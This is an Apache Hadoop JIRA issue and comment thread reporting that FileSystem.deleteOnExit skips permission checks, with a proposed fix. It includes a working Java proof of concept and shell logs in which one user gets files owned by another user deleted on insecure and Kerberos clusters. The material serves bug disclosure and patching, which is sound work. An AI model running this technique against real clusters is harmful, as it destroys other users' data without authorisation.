[ 
https://issues.apache.org/jira/browse/HADOOP-15725?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16608859#comment-16608859
 ] 

Oleksandr Shevchenko commented on HADOOP-15725:
-----------------------------------------------

[~eyang] Thank you for your attention to this issue. I took your comments into 
account and checked them.

The problem is not related to the HDFS admin user or to Kerberos vs. non-Kerberos 
clusters. I was able to reproduce the same issue with a non-admin user on both a 
secure and an insecure cluster.
{noformat}
1) Insecure cluster: run the program on behalf of the "hive" user and delete a file 
with "700 hive:hive" permissions on behalf of the "hive2" user
hive@node:~$ hadoop fs -ls /user/hive
Found 2 items
-rwx------ 1 hive hive 0 2018-09-10 07:02 /user/hive/testfile
drwxrwxr-x - root supergroup 0 2018-09-10 06:57 /user/hive/warehouse
hive@node:~$ java -jar testDeleteOther.jar 
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_-1314892313_1, ugi=hive 
(auth:SIMPLE)]]
/user/hive/testfile
hive2 (auth:SIMPLE)
hive@node:~$ hadoop fs -ls /user/hive
Found 1 items
drwxrwxr-x - root supergroup 0 2018-09-10 06:57 /user/hive/warehouse
hive@node:~$ id
uid=1000(hive) gid=1000(hive) groups=1000(hive)
hive@node:~$

2) Secure (Kerberos) cluster: run the program on behalf of the "hive" user and delete 
a file with "700 hive:hive" permissions on behalf of the "hive2" user
[hive@node ~]$ hadoop fs -ls /hive
Found 1 items
-rwx------ 1 hive hive 0 2018-09-10 07:56 /hive/testfile
[hive@node ~]$  java -jar testDeleteOther.jar
DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_-1980008782_1, 
ugi=h...@example.com (auth:KERBEROS)]]
/hive/testfile
hive2 (auth:KERBEROS)
[hive@node ~]$ hadoop fs -ls /hive
[hive@node ~]$
{noformat}

The main cause of the problem is that we allow any user to add any file to the 
delete-on-exit list, without checking that user's permissions on the file, as long 
as the user holds a reference to a FileSystem object created by another user.
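
For reference, a rough paraphrase (from memory, not the exact Hadoop source) of the 
current behavior: deleteOnExit only verifies that the path exists and stores it, and 
close() later deletes everything in the set as the user who owns the FileSystem 
instance; the caller's identity is never consulted:
{code:java}
import java.io.IOException;
import java.util.Set;
import java.util.TreeSet;

import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;

// Rough paraphrase of the current behavior, for illustration only.
class DeleteOnExitSketch {
  private final FileSystem fs;
  private final Set<Path> deleteOnExit = new TreeSet<>();

  DeleteOnExitSketch(FileSystem fs) {
    this.fs = fs;
  }

  // Only existence is verified; the caller's permissions are never checked.
  boolean deleteOnExit(Path f) throws IOException {
    if (!fs.exists(f)) {
      return false;
    }
    synchronized (deleteOnExit) {
      deleteOnExit.add(f);
    }
    return true;
  }

  // Called from close()/the shutdown hook: deletes as whoever created the
  // FileSystem instance, regardless of who added the path.
  void processDeleteOnExit() {
    synchronized (deleteOnExit) {
      for (Path p : deleteOnExit) {
        try {
          fs.delete(p, true);
        } catch (IOException e) {
          // best effort, ignored
        }
      }
      deleteOnExit.clear();
    }
  }
}
{code}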

I agree with you that this vulnerability is not easy to exploit, since the attacker 
needs a reference to a FileSystem object, especially on a secured cluster (the user 
needs a Kerberos ticket). But I think this is still a problem. Even if no user 
intends to exploit this bug, we still have incorrect behavior that can lead to 
accidental deletion of files.
I propose to add a permission check when a file is added to the deleteOnExit list 
and to throw an AccessControlException when the user adding the file does not have 
enough permissions to delete it.
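
A minimal sketch of the kind of check I have in mind (names and placement are 
illustrative, not a final patch). It approximates the POSIX rule that deleting a 
file requires WRITE permission on its parent directory, evaluated for the calling 
UGI, and it ignores ACLs and the sticky bit:
{code:java}
import java.io.IOException;
import java.util.Arrays;

import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsAction;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.security.AccessControlException;
import org.apache.hadoop.security.UserGroupInformation;

final class DeleteOnExitPermissionCheck {

  // Hypothetical helper: verify that the *calling* UGI could delete the path
  // before it is added to the deleteOnExit list. Simplification: deleting a
  // file requires WRITE permission on its parent directory; ACLs and the
  // sticky bit are not considered here.
  static void checkCallerCanDelete(FileSystem fs, Path f) throws IOException {
    UserGroupInformation caller = UserGroupInformation.getCurrentUser();
    Path parent = (f.getParent() != null) ? f.getParent() : f;
    FileStatus st = fs.getFileStatus(parent);
    FsPermission perm = st.getPermission();

    FsAction allowed;
    if (caller.getShortUserName().equals(st.getOwner())) {
      allowed = perm.getUserAction();
    } else if (Arrays.asList(caller.getGroupNames()).contains(st.getGroup())) {
      allowed = perm.getGroupAction();
    } else {
      allowed = perm.getOtherAction();
    }

    if (!allowed.implies(FsAction.WRITE)) {
      throw new AccessControlException("User " + caller.getShortUserName()
          + " has no WRITE permission on " + parent
          + " and cannot delete " + f);
    }
  }

  private DeleteOnExitPermissionCheck() {
  }
}
{code}
FileSystem#deleteOnExit could call such a check before adding the path to its set 
and propagate the AccessControlException to the caller instead of silently accepting 
the path; whether the check should be done client-side like this or delegated to the 
NameNode is open for discussion.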

> FileSystem.deleteOnExit should check user permissions
> -----------------------------------------------------
>
>                 Key: HADOOP-15725
>                 URL: https://issues.apache.org/jira/browse/HADOOP-15725
>             Project: Hadoop Common
>          Issue Type: Bug
>            Reporter: Oleksandr Shevchenko
>            Priority: Major
>              Labels: Security
>         Attachments: deleteOnExitReproduce
>
>
> Currently, any user is able to add any file to a FileSystem's deleteOnExit list. 
> This leads to security problems. A user ("Intruder") can obtain a file system 
> instance that was created by another user ("Owner") and mark arbitrary files for 
> deletion, even if "Intruder" does not have any access to those files. Later, when 
> "Owner" invokes the close method (or the JVM shuts down, since a ShutdownHook 
> closes all file systems), the marked files are deleted successfully because the 
> deletion is performed on behalf of "Owner" (the user who ran the program).
> I attached the patch [^deleteOnExitReproduce], which reproduces this scenario. I 
> was also able to reproduce it on a cluster with both the Local and Distributed 
> file systems:
> {code:java}
> import java.security.PrivilegedExceptionAction;
>
> import org.apache.hadoop.conf.Configuration;
> import org.apache.hadoop.fs.FileSystem;
> import org.apache.hadoop.fs.Path;
> import org.apache.hadoop.security.UserGroupInformation;
>
> public class Main {
>   public static void main(String[] args) throws Exception {
>     Configuration conf = new Configuration();
>     conf.set("fs.default.name", "hdfs://node:9000");
>     conf.set("fs.hdfs.impl",
>         org.apache.hadoop.hdfs.DistributedFileSystem.class.getName());
>
>     // The FileSystem instance is created by the user who runs the program ("Owner").
>     final FileSystem fs = FileSystem.get(conf);
>     System.out.println(fs);
>
>     Path f = new Path("/user/root/testfile");
>     System.out.println(f);
>
>     // Another user ("Intruder") marks the file for deletion on the Owner's
>     // FileSystem instance; no permission check is performed here.
>     UserGroupInformation hive = UserGroupInformation.createRemoteUser("hive");
>     hive.doAs((PrivilegedExceptionAction<Boolean>) () -> fs.deleteOnExit(f));
>
>     // close() processes the deleteOnExit list as the Owner, so the file is deleted.
>     fs.close();
>   }
> }
> {code}
> Result:
> {noformat}
> root@node:/# hadoop fs -put testfile /user/root
> root@node:/# hadoop fs -chmod 700 /user/root/testfile
> root@node:/# hadoop fs -ls /user/root
> Found 1 items
> -rw------- 1 root supergroup 0 2018-09-06 18:07 /user/root/testfile
> root@node:/# java -jar testDeleteOther.jar 
> log4j:WARN No appenders could be found for logger 
> (org.apache.hadoop.conf.Configuration.deprecation).
> log4j:WARN Please initialize the log4j system properly.
> log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more 
> info.
> DFS[DFSClient[clientName=DFSClient_NONMAPREDUCE_309539034_1, ugi=root 
> (auth:SIMPLE)]]
> /user/root/testfile
> []
> root@node:/# hadoop fs -ls /user/root
> root@node:/# 
> {noformat}
> We should check user permissions before marking a file for deletion. 
>  Could someone evaluate this? If no one objects, I would like to start working on 
> this.
>  Thanks a lot for any comments.


